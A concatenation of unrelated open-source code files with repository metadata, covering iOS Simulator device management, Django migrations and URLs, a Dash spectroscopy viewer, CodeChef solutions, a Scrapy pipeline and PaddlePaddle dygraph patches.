Simulator.wait_until_device_is_in_state(udid, Simulator.DeviceState.BOOTED, timeout_seconds)
with timeout(seconds=timeout_seconds):
while True:
try:
state = subprocess.check_output(['xcrun', 'simctl', 'spawn', udid, 'launchctl', 'print', 'system']).strip()
if re.search("A[\s]+com.apple.springboard.services", state):
return
except subprocess.CalledProcessError:
if Simulator.device_state(udid) != Simulator.DeviceState.BOOTED:
raise RuntimeError('Simuator device quit unexpectedly.')
_log.warn("Error in checking Simulator boot status. Will retry in 1 second.")
time.sleep(1)
@staticmethod
def wait_until_device_is_in_state(udid, wait_until_state, timeout_seconds=60 * 5):
with timeout(seconds=timeout_seconds):
while (Simulator.device_state(udid) != wait_until_state):
time.sleep(0.5)
@staticmethod
def device_state(udid):
device_plist = os.path.join(Simulator.device_directory(udid), 'device.plist')
if not os.path.isfile(device_plist):
return Simulator.DeviceState.DOES_NOT_EXIST
return plistlib.readPlist(device_plist)['state']
@staticmethod
def device_directory(udid):
return os.path.realpath(os.path.expanduser(os.path.join('~/Library/Developer/CoreSimulator/Devices', udid)))
def delete_device(self, udid):
Simulator.wait_until_device_is_in_state(udid, Simulator.DeviceState.SHUTDOWN)
Device.delete(udid)
def refresh(self):
"""
Refresh runtime and device type information from ``simctl list``.
"""
lines = self._host.platform.xcode_simctl_list()
device_types_header = next(lines)
if device_types_header != '== Device Types ==':
raise RuntimeError('Expected == Device Types == header but got: "{}"'.format(device_types_header))
self._parse_device_types(lines)
def _parse_device_types(self, lines):
"""
Parse device types from ``simctl list``.
:param lines: A generator for the output lines from ``simctl list``.
:type lines: genexpr
:return: None
"""
for line in lines:
device_type_match = self.device_type_re.match(line)
if not device_type_match:
if line != '== Runtimes ==':
raise RuntimeError('Expected == Runtimes == header but got: "{}"'.format(line))
break
device_type = DeviceType(name=device_type_match.group('name').rstrip(),
identifier=device_type_match.group('identifier'))
self.device_types.append(device_type)
self._parse_runtimes(lines)
def _parse_runtimes(self, lines):
"""
Continue to parse runtimes from ``simctl list``.
:param lines: A generator for the output lines from ``simctl list``.
:type lines: genexpr
:return: None
"""
for line in lines:
runtime_match = self.runtime_re.match(line)
if not runtime_match:
if line != '== Devices ==':
raise RuntimeError('Expected == Devices == header but got: "{}"'.format(line))
break
version = tuple(map(int, runtime_match.group('version').split('.')))
runtime = Runtime(version=version,
identifier=runtime_match.group('identifier'),
available=runtime_match.group('availability') is None,
is_internal_runtime=bool(runtime_match.group('internal')))
self.runtimes.append(runtime)
self._parse_devices(lines)
def _parse_devices(self, lines):
"""
Continue to parse devices from ``simctl list``.
:param lines: A generator for the output lines from ``simctl list``.
:type lines: genexpr
:return: None
"""
current_runtime = None
for line in lines:
version_match = self.version_re.match(line)
if version_match:
version = tuple(map(int, version_match.group('version').split('.')))
current_runtime = self.runtime(version=version, is_internal_runtime=bool(version_match.group('internal')))
assert current_runtime
continue
unavailable_version_match = self.unavailable_version_re.match(line)
if unavailable_version_match:
current_runtime = None
continue
device_match = self.devices_re.match(line)
if not device_match:
if line != '== Device Pairs ==':
raise RuntimeError('Expected == Device Pairs == header but got: "{}"'.format(line))
break
if current_runtime:
device = Device(name=device_match.group('name').rstrip(),
udid=device_match.group('udid'),
available=device_match.group('availability') is None,
runtime=current_runtime)
current_runtime.devices.append(device)
def device_type(self, name=None, identifier=None):
"""
:param name: The short name of the device type.
:type name: str
:param identifier: The CoreSimulator identifier of the desired device type.
:type identifier: str
:return: A device type with the specified name and/or identifier, or None if one doesn't exist as such.
:rtype: DeviceType
"""
for device_type in self.device_types:
if name and device_type.name != name:
continue
if identifier and device_type.identifier != identifier:
continue
return device_type
return None
def runtime(self, version=None, identifier=None, is_internal_runtime=None):
"""
:param version: The iOS version of the desired runtime.
:type version: tuple
:param identifier: The CoreSimulator identifier of the desired runtime.
:type identifier: str
:return: A runtime with the specified version and/or identifier, or None if one doesn't exist as such.
:rtype: Runtime or None
"""
if version is None and identifier is None:
raise TypeError('Must supply version and/or identifier.')
for runtime in self.runtimes:
if version and runtime.version != version:
continue
if is_internal_runtime and runtime.is_internal_runtime != is_internal_runtime:
continue
if identifier and runtime.identifier != identifier:
continue
return runtime
return None
def find_device_by_udid(self, udid):
"""
:param udid: The UDID of the device to find.
:type udid: str
:return: The `Device` with the specified UDID.
:rtype: Device
"""
for device in self.devices:
if device.udid == udid:
return device
return None
# FIXME: We should find an existing device with respect to its name, device type and runtime.
def device(self, name=None, runtime=None, should_ignore_unavailable_devices=False):
"""
:param name: The name of the desired device.
:type name: str
:param runtime: The runtime of the desired device.
:type runtime: Runtime
:return: A device with the specified name and/or runtime, or None if one doesn't exist as such
:rtype: Device or None
"""
if name is None and runtime is None:
raise TypeError('Must supply name and/or runtime.')
for device in self.devices:
if should_ignore_unavailable_devices and not device.available:
continue
if name and device.name != name:
continue
if runtime and device.runtime != runtime:
continue
return device
return None
@property
def available_runtimes(self):
"""
:return: An iterator of all available runtimes.
:rtype: iter
"""
return itertools.ifilter(lambda runtime: runtime.available, self.runtimes)
@property
def devices(self):
"""
:return: An iterator of all devices from all runtimes.
:rtype: iter
"""
return itertools.chain(*[runtime.devices for runtime in self.runtimes])
@property
def latest_available_runtime(self):
"""
:return: Returns a Runtime object with the highest version.
:rtype: Runtime or None
"""
if not self.runtimes:
return None
return sorted(self.available_runtimes, key=lambda runtime: runtime.version, reverse=True)[0]
def lookup_or_create_device(self, name, device_type, runtime):
"""
Returns an available iOS Simulator device for testing.
This function will create a new simulator device with the specified name,
device type and runtime if one does not already exist.
:param name: The name of the simulator device to lookup or create.
:type name: str
:param device_type: The CoreSimulator device type.
:type device_type: DeviceType
:param runtime: The CoreSimulator runtime.
:type runtime: Runtime
:return: A dictionary describing the device.
:rtype: Device
"""
assert(runtime.available)
testing_device = self.device(name=name, runtime=runtime, should_ignore_unavailable_devices=True)
if testing_device:
return testing_device
testing_device = Device.create(name, device_type, runtime)
assert(testing_device.available)
return testing_device
def __repr__(self):
return '<iOS Simulator: {num_runtimes} runtimes, {num_device_types} device types>'.format(
num_runtimes=len(self.runtimes),
num_device_types=len(self.device_types))
def __str__(self):
description = ['iOS Simulator:']
description += map(str, self.runtimes)
description += map(str, self.device_types)
description += map(str, self.devices)
return '\n'.join(description)
| [
"daewoong.jang@navercorp.com"
] | daewoong.jang@navercorp.com |
5d34c6e9071fafae363483890c7e561f7ba6a451 | 2cadada30d1034dda64e2f1b08cb42b50d309bdf | /posts/migrations/0009_auto_20170829_1143.py | fe7568dedd79a82a0012d92ef6dd9411880b28ca | [] | no_license | sparsh0204/Ask-Lnmiit | 123d262023c39d9aacfe13a6d7a21996b418ac8e | 0b69f64ee2a23fc686df248d34f032c470c2d306 | refs/heads/master | 2022-12-11T03:25:26.368977 | 2020-01-13T07:29:28 | 2020-01-13T07:29:28 | 102,007,285 | 3 | 1 | null | 2022-12-08T00:42:12 | 2017-08-31T14:06:49 | HTML | UTF-8 | Python | false | false | 488 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-29 11:43
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('posts', '0008_auto_20170829_1141'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='image',
field=models.FileField(default='Images/No-img.jpg', null=True, upload_to=''),
),
]
| [
"sparshcode@gmail.com"
] | sparshcode@gmail.com |
2367b2c940668ee9e4ef5b53807358cb108491b3 | 42704268be9dc9c92f0c31d29e4c87ef5452862e | /add_strings_2.py | 72876c2346b38a93f526b9846af010bfc866fd6a | [] | no_license | djassal/python | 08af33e061cfbea8785d999ce88a768ae0ac6f1e | 4c902ee3c625dd7d8b486cd7821110e7f6a0d70b | refs/heads/master | 2020-06-25T07:35:27.449249 | 2019-07-28T05:44:50 | 2019-07-28T05:44:50 | 199,247,397 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 330 | py | domains = ["google","www.unix","oracle.com"]
for x in range(0, len(domains)):
if not "com" in domains[x] and not "www" in domains[x]:
print("www." + domains[x] + ".com")
elif not "www" in domains[x]:
print("www." + domains[x])
elif not "com" in domains[x]:
print(domains[x] + ".com")
| [
"noreply@github.com"
] | djassal.noreply@github.com |
71e949188be81367e2b96ae89c790224fd52a025 | ffc8eb0ba8b9ec73e896ffe9a8c2d594cd614e99 | /vis.py | bf35e0d577616f92e1dd812b664b36cbe5bcd90e | [] | no_license | nachmc3/2D_Vis | b67623471df99ac5c014c8059eb639ec2319f578 | 1a3b5a6bc10cecb06699b2fcba96a5ac2bb77d64 | refs/heads/master | 2023-04-16T19:32:31.908242 | 2021-04-25T16:52:22 | 2021-04-25T16:52:22 | 354,744,200 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,788 | py | import numpy as np
import pandas as pd
import glob
import plotly.graph_objects as go
import os
from jupyter_dash import JupyterDash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import plotly.io as pio
pio.templates.default = "plotly_white"
class maps():
def __init__(self):
path0 = r"Fit_Data/"
semi = "test/"
folders = ["2D_AP2/", "2D_DC2/"]
subfolders = ["2D_rdata/", "FT_camp/", "FT_camp_wtoint/", "FT_ramp/", "FT_iamp/"]
scan_points = np.arange(-3000, +3000, 1)
self.data = {"2D_AP2/":
{"2D_rdata/":{}, "FT_camp/":{}, "FT_camp_wtoint/":{}, "FT_ramp/":{}, "FT_iamp/":{}},
"2D_DC2/":
{"2D_rdata/":{}, "FT_camp/":{}, "FT_camp_wtoint/":{}, "FT_ramp/":{}, "FT_iamp/":{}}}
for folder in folders:
for subfolder in subfolders:
print("Loading {}, {} data".format(folder, subfolder))
path1 = path0 + folder + semi + subfolder
for point in scan_points:
try:
temp = np.loadtxt(path1 + "{}.txt".format(point))
self.data[folder][subfolder][str(point)] = temp
except OSError:
pass
self.maxpoints = {"2D_AP2/":{}, "2D_DC2/":{}}
for folder in folders:
for subfolder in subfolders:
array = []
for matrix in list(self.data[folder][subfolder].values()):
array.append(matrix[1:, 1:].max())
self.maxpoints[folder][subfolder] = max(array)
colorbar = dict(
title='Amplitude', # title here
titleside='right',
nticks=100,
titlefont=dict(
size=14,
family='Arial, sans-serif'))
# RUN DASH
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = JupyterDash(__name__, external_stylesheets=external_stylesheets)
app.title = "Beating maps analysis!"
app.layout = html.Div(
children=[
html.Div(
children=[
html.H1(
children="Beating maps analysis", className="header-title"
),
html.P(
children="Analyze the beating maps",
className="header-description",
),
],
className="header",
),
html.Label('Experiment'),
dcc.Dropdown(
id='folder',
options=[{'label': i, 'value': i} for i in folders],
value='2D_AP2/',
style={"width": "50%"}
),
html.Label('Type of information'),
dcc.Dropdown(
id='subfolder',
options=[{'label': i, 'value': i} for i in subfolders],
optionHeight=20,
value='FT_camp/',
style={"width": "50%"}
),
html.Label('Frequency Beating'),
dcc.Dropdown(
id='point',
options=[{'label': i, 'value': i} for i in self.data["2D_AP2/"]["FT_camp/"].keys()],
optionHeight=20,
value='-342',
style={"width": "50%"}
),
html.Label('Normalize'),
dcc.Dropdown(
id='norm',
options=[{'label': i, 'value': i} for i in ["Yes", "No"]],
optionHeight=20,
value='Yes',
style={"width": "50%"}
),
html.Div(dcc.Graph(id='indicator-graphic'),
),
],
)
@app.callback(
Output('indicator-graphic', 'figure'),
Input('folder', 'value'),
Input('subfolder', 'value'),
Input('point', 'value'),
Input('norm', 'value'))
def update_graph(folder_name, subfolder_name, point_name, norm_name):
temporal_data = self.data[folder_name][subfolder_name][point_name]
zmax = self.maxpoints[folder_name][subfolder_name]
if norm_name == "Yes":
fig = go.Figure(data=go.Contour(x=temporal_data[0, 1:], y=temporal_data[1:, 0], z=temporal_data[1:, 1:]/zmax,
colorscale="Hot_r",
colorbar=colorbar,
contours=dict(start=0, end=1, size=0.1)
))
if norm_name == "No":
fig = go.Figure(data=go.Contour(x=temporal_data[0, 1:], y=temporal_data[1:, 0], z=temporal_data[1:, 1:]/zmax,
colorscale="Hot_r",
colorbar=colorbar
))
fig.update_layout(width=600, height=600)
return fig
app.run_server(mode="external", debug=False)
class integratedFT():
def __init__(self):
path0 = r"Fit_Data/"
semi = "test/"
folders = ["2D_AP2/", "2D_DC2/", "TG_AP1/", "TG_AP2/", "TG_DC1/", "TG_DC2/"]
scan_files = ["integrated_ft", "integrated_ft_cross_low", "integrated_ft_cross_upp"]
self.data = {"2D_AP2/":{"integrated_ft":{}, "integrated_ft_cross_low":{}, "integrated_ft_cross_upp":{}}, "2D_DC2/":{"integrated_ft":{}, "integrated_ft_cross_low":{}, "integrated_ft_cross_upp":{}},
"TG_AP1/":{"integrated_ft":{}, "integrated_ft_cross_low":{}, "integrated_ft_cross_upp":{}}, "TG_AP2/":{"integrated_ft":{}, "integrated_ft_cross_low":{}, "integrated_ft_cross_upp":{}},
"TG_DC1/":{"integrated_ft":{}, "integrated_ft_cross_low":{}, "integrated_ft_cross_upp":{}}, "TG_DC2/":{"integrated_ft":{}, "integrated_ft_cross_low":{}, "integrated_ft_cross_upp":{}}}
for folder in folders:
print("Loading {} data".format(folder))
path1 = path0 + folder + semi
for file in scan_files:
df = pd.read_csv(path1 + file + ".txt", header=None, sep = " ", names=["x", "y"])
df = df.sort_values(by=["x"], ascending=True)
df = df.reset_index(drop=True)
df["ynor"] = df["y"] - df["y"][0:50].min()
df["ynor"] = df["ynor"] / df["ynor"].max()
self.data[folder][file] = df
#RUN DASH
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = JupyterDash(__name__, external_stylesheets=external_stylesheets)
app.title = "Integrated FT analysis!"
app.layout = html.Div(
children=[
html.Div(
children=[
html.H1(
children="Integrated FT analysis", className="header-title"
),
html.P(
children="Analyze the fourier spectra",
className="header-description",
),
],
className="header",
),
html.Label('Experiment 1'),
dcc.Dropdown(
id='folder',
options=[{'label': i, 'value': i} for i in folders],
value='2D_DC2/',
style={"width": "50%"}
),
html.Label('Type of information 1'),
dcc.Dropdown(
id='file',
options=[{'label': i, 'value': i} for i in scan_files],
optionHeight=20,
value='integrated_ft_cross_low',
style={"width": "50%"}
),
html.Label('Normalize 1'),
dcc.Dropdown(
id='norm',
options=[{'label': i, 'value': i} for i in ["Yes", "No"]],
optionHeight=20,
value='Yes',
style={"width": "50%"}
),
html.Label('Experiment 2'),
dcc.Dropdown(
id='folder2',
options=[{'label': i, 'value': i} for i in folders],
value='2D_DC2/',
style={"width": "50%"}
),
html.Label('Type of information 2'),
dcc.Dropdown(
id='file2',
options=[{'label': i, 'value': i} for i in scan_files],
optionHeight=20,
value='integrated_ft_cross_upp',
style={"width": "50%"}
),
html.Label('Normalize 2'),
dcc.Dropdown(
id='norm2',
options=[{'label': i, 'value': i} for i in ["Yes", "No"]],
optionHeight=20,
value='Yes',
style={"width": "50%"}
),
html.Div(dcc.Graph(id='indicator-graphic'),
),
],
)
@app.callback(
Output('indicator-graphic', 'figure'),
Input('folder', 'value'),
Input('file', 'value'),
Input('norm', 'value'),
Input('folder2', 'value'),
Input('file2', 'value'),
Input('norm2', 'value'))
def update_graph(folder_name, file_name, norm_name, folder2_name, file2_name, norm2_name):
temporal_data = self.data[folder_name][file_name]
temporal_data2 = self.data[folder2_name][file2_name]
fig = go.Figure()
if norm_name == "Yes":
fig.add_trace(go.Scatter(x=temporal_data["x"], y=temporal_data["ynor"],
name="Exp: {} Curve: {}".format(folder2_name, file2_name),
line=dict(color='MediumSeaGreen')))
if norm_name == "No":
fig.add_trace(go.Scatter(x=temporal_data["x"], y=temporal_data["y"],
name="Exp: {} Curve: {}".format(folder2_name, file2_name),
line=dict(color='MediumSeaGreen')))
if norm2_name == "Yes":
fig.add_trace(go.Scatter(x=temporal_data2["x"], y=temporal_data2["ynor"],
name="Exp: {} Curve: {}".format(folder2_name, file2_name),
line=dict(color='Tomato')))
if norm2_name == "No":
fig.add_trace(go.Scatter(x=temporal_data2["x"], y=temporal_data2["y"],
name="Exp: {} Curve: {}".format(folder2_name, file2_name),
line=dict(color='Tomato')))
fig.update_layout(width=1200, height=600)
return fig
app.run_server(mode="external", debug=False)
| [
"ignaciomc18@gmail.com"
] | ignaciomc18@gmail.com |
54229a86e150c2add9cea94da86d074a6cb921f2 | 72008ae16bd4f8ec0862d1bcce06c66ba24a11dd | /codecheftest.py | 60481d69266655862bd95a6c03a7498f8ed4a534 | [] | no_license | Tarique-web/CODECHEF_CONTEST_SOLUTION | 67fb90c31a8ee6f7f2366e2d76f1c0c806465889 | 594cdc4d317ea12c72ce70135c75b587b7abe7a8 | refs/heads/master | 2022-12-27T14:53:07.949412 | 2020-09-29T04:15:13 | 2020-09-29T04:15:13 | 299,498,518 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,427 | py | # -----------------------SMART PHONE----------------------
test_cases=int(input())
budget=[]
for i in range(test_cases):
budget.append(int(input()))
budget.sort()
budget_len=len(budget)
budget_max=[]
for j in range(budget_len):
budget_max.append((budget[j]*(budget_len)))
budget_len-=1
max1=budget_max[0]
for l in range(len(budget_max)):
if budget_max[l]>=max1:
max1=budget_max[l]
print(max1)
# ----------------------------Grade The Steel-------------------------------------
TestCase=int(input())
for i in range(TestCase):
H,C,T=map(str,input().split())
H=int(H)
C=float(C)
T=int(T)
if H>50 and C<0.7 and T>5600:
grade=10
elif H>50 and C<0.7:
grade=9
elif C<0.7 and T>5600:
grade=8
elif H>50 and T>5600:
grade=7
elif H>50 or C<0.7 or T>5600:
grade=6
else:
grade=5
print(grade)
# -----------------------Chef and Remissness --------------------
TestCase=int(input())
for i in range(TestCase):
A,B=map(int,input().split())
if A>B:
print(A,A+B)
else:
print(B,A+B)
# --------------------------Lucky Fours-----------------------
TestCase=int(input())
for i in range(TestCase):
N=input()
counter=0
for j in range(0,len(N)):
if N[j]=="4":
counter+=1
print(counter)
# ---------------------------------------------------------TEST DONE BY 28SEP2020---------------------------------------------------------------------- | [
"noreply@github.com"
] | Tarique-web.noreply@github.com |
b71088a81e42ad63fdfe6b910308c7bb658194e4 | 0b4d7da0bb47fd94c2590999e59414934411e176 | /venv/Scripts/easy_install-script.py | 5aa1e510ba8baa011f381e864b0eb921d133e172 | [] | no_license | toddAwesome/UWB-postion-analysis | e308299a480893263a85637b57ead59fb5d4c4fa | 622f940f9472a074ef7b5d45e5945df94e8456c6 | refs/heads/master | 2022-12-10T15:19:14.502856 | 2018-08-22T15:17:37 | 2018-08-22T15:17:37 | 145,459,844 | 4 | 0 | null | 2022-12-08T02:22:48 | 2018-08-20T19:10:43 | Python | UTF-8 | Python | false | false | 459 | py | #!D:\pyCharm-workspace\IndoorPositionDataAnalysis\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==28.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==28.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==28.8.0', 'console_scripts', 'easy_install')()
)
| [
"toddrobb11@gmail.com"
] | toddrobb11@gmail.com |
4f8e9dcd97ab00a31aed0513093605e614165a2c | 23f33b344828717f3e7b5b85bd45d69b5ba0b1ce | /python/paddle/fluid/dygraph/varbase_patch_methods.py | 10f448fe8075cb551c29e6f1eeb27cea0e29c435 | [
"Apache-2.0"
] | permissive | abbasidaniyal/Paddle | 2f5ef4dadbbedb66c6ac7c2e3c82ffad0d2ef000 | c3527f5526ee96398760cbef11d7de48f41fe998 | refs/heads/develop | 2020-12-02T05:12:22.353302 | 2019-12-30T06:38:44 | 2019-12-30T06:38:44 | 230,898,990 | 0 | 0 | Apache-2.0 | 2020-06-11T15:12:33 | 2019-12-30T10:53:00 | null | UTF-8 | Python | false | false | 10,440 | py | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .. import framework
from .. import core
from . import BackwardStrategy
from ..framework import Variable, _getitem_impl_
from .. import unique_name
import numpy as np
from .math_op_patch import monkey_patch_math_varbase
def monkey_patch_varbase():
# TODO(jiabin): move this to cplusplus end if we find some performance issue on it
@framework.dygraph_only
def set_value(self, value):
"""
**Notes**:
**This API is ONLY avaliable in Dygraph mode**
Set a new value for this Variable.
Args:
value (Variable|np.ndarray): the new value.
Examples:
.. code-block:: python
import paddle.fluid as fluid
from paddle.fluid.dygraph.base import to_variable
from paddle.fluid.dygraph import FC
import numpy as np
data = np.ones([3, 32, 32], dtype='float32')
with fluid.dygraph.guard():
fc = fluid.dygraph.FC("fc", 4)
t = to_variable(data)
fc(t) # call with default weight
custom_weight = np.random.randn(1024, 4).astype("float32")
fc.weight.set_value(custom_weight) # change existing weight
out = fc(t) # call with different weight
"""
assert isinstance(value, (np.ndarray, core.VarBase)), \
"Variable set_value function, arguments type only support Variable, numpy, VarBase"
value_np = value
if isinstance(value, core.VarBase):
value_np = value.numpy()
self_tensor_np = self.numpy()
assert self_tensor_np.shape == value_np.shape, \
"Variable Shape not match, Variable [ {} ] need tensor with shape {} but load set tensor with shape {}".format(
self.name, self_tensor_np.shape, value_np.shape)
assert self_tensor_np.dtype == value_np.dtype, \
"Variable dtype not match, Variable [ {} ] need tensor with dtype {} but load tensor with dtype {}".format(
self.name, self_tensor_np.dtype, value_np.dtype)
self.value().get_tensor().set(value_np,
framework._current_expected_place())
@framework.dygraph_only
def backward(self, backward_strategy=None):
"""
**Notes**:
**This API is ONLY avaliable in Dygraph mode**
Run backward of current Graph which starts from current Variable
Args:
backward_strategy( :ref:`api_fluid_dygraph_BackwardStrategy` ): The Backward Strategy to run backward
Returns:
NoneType: None
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
x = np.ones([2, 2], np.float32)
with fluid.dygraph.guard():
inputs2 = []
for _ in range(10):
tmp = fluid.dygraph.base.to_variable(x)
# if we don't set tmp's stop_gradient as False then, all path to loss will has no gradient since
# there is no one need gradient on it.
tmp.stop_gradient=False
inputs2.append(tmp)
ret2 = fluid.layers.sums(inputs2)
loss2 = fluid.layers.reduce_sum(ret2)
backward_strategy = fluid.dygraph.BackwardStrategy()
backward_strategy.sort_sum_gradient = True
loss2.backward(backward_strategy)
"""
if framework.in_dygraph_mode():
if backward_strategy is None:
backward_strategy = BackwardStrategy()
backward_strategy.sort_sum_gradient = False
self._run_backward(backward_strategy, framework._dygraph_tracer())
else:
raise ValueError(
"Variable.backward() is only avaliable in DyGraph mode")
@framework.dygraph_only
def gradient(self):
"""
**Notes**:
**This API is ONLY avaliable in Dygraph mode**
Get the Gradient of Current Variable
Returns:
ndarray: Numpy value of the gradient of current Variable
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
x = np.ones([2, 2], np.float32)
with fluid.dygraph.guard():
inputs2 = []
for _ in range(10):
tmp = fluid.dygraph.base.to_variable(x)
tmp.stop_gradient=False
inputs2.append(tmp)
ret2 = fluid.layers.sums(inputs2)
loss2 = fluid.layers.reduce_sum(ret2)
backward_strategy = fluid.dygraph.BackwardStrategy()
backward_strategy.sort_sum_gradient = True
loss2.backward(backward_strategy)
print(loss2.gradient())
"""
if self._grad_ivar() is None:
raise ValueError(
"%s has no grad, Please set Variable.stop_gradient=False, or "
"check if this is the first and only variable need grad, if so, please set its pre-Variable's "
"stop_gradient=False, to make sure it has gradient " %
self.name)
new_ivar = self._grad_ivar()._copy_to(core.CPUPlace(), True)
if self._grad_ivar().type == core.VarDesc.VarType.SELECTED_ROWS:
return (np.array(new_ivar.value().get_selected_rows().get_tensor()),
np.array(new_ivar.value().get_selected_rows().rows()))
else:
return np.array(new_ivar.value().get_tensor())
def __str__(self):
return self.to_string(True)
@property
def block(self):
return framework.default_main_program().global_block()
def to_string(self, throw_on_error, with_details=False):
"""
Get debug string.
Args:
throw_on_error (bool): True if raise an exception when self is not initialized.
with_details (bool): more details about variables and parameters (e.g. trainable, optimize_attr, ...) will be printed when with_details is True. Default value is False;
Returns:
str: The debug string.
Examples:
.. code-block:: python
import paddle.fluid as fluid
cur_program = fluid.Program()
cur_block = cur_program.current_block()
new_variable = cur_block.create_var(name="X",
shape=[-1, 23, 48],
dtype='float32')
print(new_variable.to_string(True))
print("=============with detail===============")
print(new_variable.to_string(True, True))
"""
if framework.in_dygraph_mode():
# TODO(panyx0718): add more dygraph debug info.
tensor = self.value().get_tensor()
if tensor._is_initialized():
return 'name %s, dtype: %s shape: %s %s' % (
self.name, self.dtype, self.shape, str(tensor))
else:
return 'name %s, shape: %s, not inited' % (self.name,
self.shape)
def __getitem__(self, item):
if not isinstance(item, tuple):
item = [item]
decrease_axis = []
slice_axis = []
slice_start = []
slice_end = []
reverse_axis = []
for dim, slice_item in enumerate(item):
if isinstance(slice_item, slice):
start = slice_item.start
end = slice_item.stop
step = slice_item.step if slice_item.step else 1
assert (step == 1 or step == -1)
if step == -1:
reverse_axis.append(dim)
assert (start is None and end is None)
if start is None and end is None:
continue
if start is None:
start = 0
if end is None:
end = 10000000
slice_axis.append(dim)
slice_start.append(start)
slice_end.append(end)
else:
# int
decrease_axis.append(dim)
slice_axis.append(dim)
slice_start.append(slice_item)
slice_end.append(slice_item + 1
if slice_item != -1 else 10000000)
out = self
if len(slice_axis) > 0:
# append slice_op here
inputs = {'Input': [out]}
attrs = {
'axes': slice_axis,
'starts': slice_start,
'ends': slice_end,
'decrease_axis': decrease_axis
}
outs = core.ops.slice(inputs, attrs)
out = outs['Out'][0]
if len(reverse_axis) > 0:
inputs = {'X': [out]}
attrs = {'axis': reverse_axis}
outs = core.ops.reverse(inputs, attrs)
out = outs['Out'][0]
return out
for method_name, method in (("set_value", set_value), ("block", block),
("backward", backward), ("gradient", gradient),
("__str__", __str__), ("to_string", to_string),
("__getitem__", __getitem__)):
setattr(core.VarBase, method_name, method)
# patch math methods for varbase
monkey_patch_math_varbase()
| [
"noreply@github.com"
] | abbasidaniyal.noreply@github.com |
5143a8db1daaaf86a81a2b7dc43ea8d0137537fd | 9ae6a45b4f5534243248bf5cd2bdfea6d932a857 | /eshop/shop/search_view.py | d3b2b2fc2a9d9e9e8be36355366b9af70377afb4 | [] | no_license | derekCRO/djangoforeshop | 05f5da66c5ab2c43c29c5dc9b899db099406e170 | 824a57d00fa63b21fe52fc0ab839de57a84a4efa | refs/heads/master | 2023-01-19T13:36:14.683403 | 2018-08-09T14:58:41 | 2018-08-09T14:58:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 704 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2017/7/10 18:37
# @Author : zhl
# @Site :
# @File : search_view.py
# @Software: PyCharm
from haystack.generic_views import SearchView
class MySearchView(SearchView):
# def get_queryset(self):
# # print("get_queryset")
# # queryset = super(MySearchView, self).get_queryset()
# # # further filter queryset based on some set of criteria
# # return queryset.filter(goods_price__gt='100')
def get_context_data(self, *args, **kwargs):
print("get_context_data")
context = super(MySearchView, self).get_context_data(*args, **kwargs)
# context['haha'] = '1'
return context | [
"tiop08317@gmail.com"
] | tiop08317@gmail.com |
9357a8f90907e0020b4d6950974fa58909570709 | 260ff9e3b9dfeb208c78499914491b4e5125a025 | /xianc/wikitravel/pipelines.py | e45fe029956518e0fde52e2c8bc3f353fd1b327c | [
"MIT",
"LicenseRef-scancode-other-permissive"
] | permissive | Soni96pl/Xian-C | 51284a6d4f316eb34c402dbce5a91c4905c1b2ed | 16170ae9ecc0d2a49c57c7833e538c18a1ade216 | refs/heads/master | 2021-06-09T21:27:32.941546 | 2016-11-27T11:33:33 | 2016-11-27T11:33:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 340 | py | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
class WikitravelPipeline(object):
def process_item(self, item, spider):
item['db']['story'] = item['story']
item['db'].save()
| [
"jakub@chronow.ski"
] | jakub@chronow.ski |
bcf0008e7c32cc0962365c810680c301ab8abedb | 58497ad5ed78d82a2519faeaecbec724fb7d4f60 | /mfscrm/urls.py | 91c49b2982226924dc96662772a5b0c41a7aa6d3 | [] | no_license | harry2491/MSD-Assignment-1-Part-B | 94c2d092c1a7f5428e17f4eeaf812a26a102cee9 | 3593f530014809a6105e039ad7353d51d61eae01 | refs/heads/master | 2020-03-28T22:08:09.320251 | 2018-09-20T16:52:01 | 2018-09-20T16:52:01 | 149,207,245 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,203 | py | """mfscrm URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, re_path
from django.contrib import admin
from django.urls import path, include
from django.conf.urls import url, include
from django.contrib.auth.views import LoginView, LogoutView
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('crm.urls')),
re_path(r'^accounts/login/$', LoginView.as_view(template_name='registration/login.html'), name="login"),
re_path(r'^accounts/logout/$', LogoutView.as_view(), LogoutView.next_page, name="logout"),
]
| [
